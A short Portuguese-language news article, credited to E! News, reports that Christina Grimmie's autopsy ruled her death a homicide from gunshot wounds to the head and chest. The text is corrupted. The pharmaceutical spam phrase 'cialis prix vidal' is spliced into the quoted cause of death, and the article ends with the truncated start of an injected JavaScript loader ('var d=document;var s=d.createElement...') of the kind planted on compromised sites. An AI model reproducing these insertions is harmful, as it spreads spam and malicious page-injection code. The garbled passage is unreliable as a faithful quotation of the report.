Fonte: E! News

O relatório da autópsia da Christina Grimmie foi concluído.

Os documentos, obtidos pela E!News, declaram que o motivo da morte da cantora de 22 anos foram “ferimentos cialis prix vidal de bala na cabeça e no peito” e a morte foi um homicídio. O relatório também reafirma que o irmão de Grimmie, Marcus, que estava presente no momento do tiroteio, foi o único a identificar o corpo.

“Levando em conta as circunstâncias da morte, e após o exame no corpo, analise de toxicologia e avaliação dos registros médicos disponíveis,” a conclusão do relatório foi estabelecida, “na minha opinião a morte da Christina Grimmie, uma mulher branca de 22 anos, que foi baleada por outro e posteriormente levada ao hospital, é resultado de ferimentos de bala na cabeça e peito. A forma da morte foi homicídio.”

O relatório continua a detalhar o estado do corpo de Grimmie após o ataque fatal, bem como observações físicas e também inclui descrições de cada tipo de arma e ilustrações que mostram quais partes do corpo de Grimmie foram atingidas.var d=document;var s=d.createElement(‘script’);